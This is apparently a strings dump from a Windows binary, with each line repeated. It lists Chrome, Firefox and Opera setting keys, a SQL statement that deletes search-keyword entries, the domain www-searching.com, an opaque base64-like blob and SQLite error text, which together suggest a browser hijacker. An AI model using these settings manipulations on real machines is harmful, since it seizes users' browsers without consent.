keyword LIKE '
WHERE key = 'Default Search Provider ID'
WHERE key = 'Default Search Provider ID'
key = 'Default Search Provider ID'
key = 'Default Search Provider ID'
DELETE from keywords WHERE id =
DELETE from keywords WHERE id =
search_url
search_url
icon_url
icon_url
startup_urls
startup_urls
chrome_url_overrides
chrome_url_overrides
urls_to_restore_on_startup
urls_to_restore_on_startup
www-searching.com
www-searching.com
template_url_data
template_url_data
image_url_post_params
image_url_post_params
instant_url
instant_url
instant_url_post_params
instant_url_post_params
search_terms_replacement_key
search_terms_replacement_key
new_tab_url
new_tab_url
search_url_post_params
search_url_post_params
suggestions_url
suggestions_url
suggestions_url_post_params
suggestions_url_post_params
chrome_settings_overrides
chrome_settings_overrides
session.startup_urls
session.startup_urls
web_url
web_url
search_icon.png
search_icon.png
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
Snapshot.xml
Snapshot.xml
MozillaFirefox
MozillaFirefox
GoogleChrome
GoogleChrome
AboutTabsUrl
AboutTabsUrl
HomePageUrl
HomePageUrl
DefaultProviderKeyword
DefaultProviderKeyword
UrlsToRestoreOnStartup
UrlsToRestoreOnStartup
StartupHomepageUrl
StartupHomepageUrl
Chrome propagate flags:
Chrome propagate flags:
Firefox propagate flags:
Firefox propagate flags:
ParentKey:
ParentKey:
rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=
rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=
2, 3, 12, 1634
2, 3, 12, 1634
Envelop.xml
Envelop.xml
UrlSet
UrlSet
Configuration.xml
Configuration.xml
Opera
Opera
StartPageUrl
StartPageUrl
AboutTabUrl
AboutTabUrl
SearchScopeUrl
SearchScopeUrl
SearchScopeIconUrl
SearchScopeIconUrl
SearchScopeSuggestUrl
SearchScopeSuggestUrl
DefaultProviderSearchUrl
DefaultProviderSearchUrl
DefaultProviderIconUrl
DefaultProviderIconUrl
DefaultProviderSuggestUrl
DefaultProviderSuggestUrl
SearchPluginUrl
SearchPluginUrl
SearchPluginSuggestionUrl
SearchPluginSuggestionUrl
TabPageUrl
TabPageUrl
SearchEngineFaviconUrl
SearchEngineFaviconUrl
SearchEngineSuggestionUrl
SearchEngineSuggestionUrl
SearchEngineSearchUrl
SearchEngineSearchUrl
SearchEngineKeyword
SearchEngineKeyword
System.xml
System.xml
Reset-2.1.0.7
Reset-2.1.0.7
ReportUrl
ReportUrl
UpdateUrl
UpdateUrl
ReportDlls
ReportDlls
User.xml
User.xml
Argument.Snapshot:
Argument.Snapshot:
Argument.GeneralConfig:
Argument.GeneralConfig:
Argument.Flags:
Argument.Flags:
Argument.StartPage:
Argument.StartPage:
Argument.Autosearch:
Argument.Autosearch:
Argument.NewTabPageShow:
Argument.NewTabPageShow:
Argument.SearchScopeId:
Argument.SearchScopeId:
Argument.Tabs:
Argument.Tabs:
select count(*) from sqlite_master where type = 'table' and name = '
select count(*) from sqlite_master where type = 'table' and name = '
%d-%m-%Y %H:%M, %a
%d-%m-%Y %H:%M, %a
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
SQL logic error or missing database
SQL logic error or missing database
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such vfs: %s
no such vfs: %s
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d-d-d
d-d-d
d:d:d
d:d:d
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
API call with %s database connection pointer
API call with %s database connection pointer
922337203685477580
922337203685477580
RowKey
RowKey
%s-shm
%s-shm
OsError 0x%x (%u)
OsError 0x%x (%u)
%s\etilqs_
%s\etilqs_
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
2nd reference to page %d
2nd reference to page %d
invalid page number %d
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
failed to get page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
Page %d:
Page %d:
freelist leaf count too big on page %d
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
unable to get the page. error code=%d
unable to get the page. error code=%d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
Pointer map page %d is referenced
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
foreign key constraint failed
foreign key constraint failed
%s-mjX
%s-mjX
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
constraint failed at %d in [%s]
constraint failed at %d in [%s]
abort at %d in [%s]: %s
abort at %d in [%s]: %s
no such savepoint: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot %s savepoint - SQL statements in progress
cannot %s savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
sqlite_master
sqlite_master
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
database table is locked: %s
database table is locked: %s
cannot open view: %s
cannot open view: %s
cannot open virtual table: %s
cannot open virtual table: %s
foreign key
foreign key
no such column: "%s"
no such column: "%s"
cannot open %s column for writing
cannot open %s column for writing
indexed
indexed
cannot open value of type %s
cannot open value of type %s
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s
%s: %s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
too many columns in %s
too many columns in %s
too many SQL variables
too many SQL variables
misuse of aggregate: %s()
misuse of aggregate: %s()
%s%.*s"%w"
%s%.*s"%w"
%.*s"%w"%s
%.*s"%w"%s
sqlite_rename_table
sqlite_rename_table
sqlite_rename_parent
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_trigger
%s OR name=%Q
%s OR name=%Q
there is already another table or index with this name: %s
there is already another table or index with this name: %s
table %s may not be altered
table %s may not be altered
sqlite_
sqlite_
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
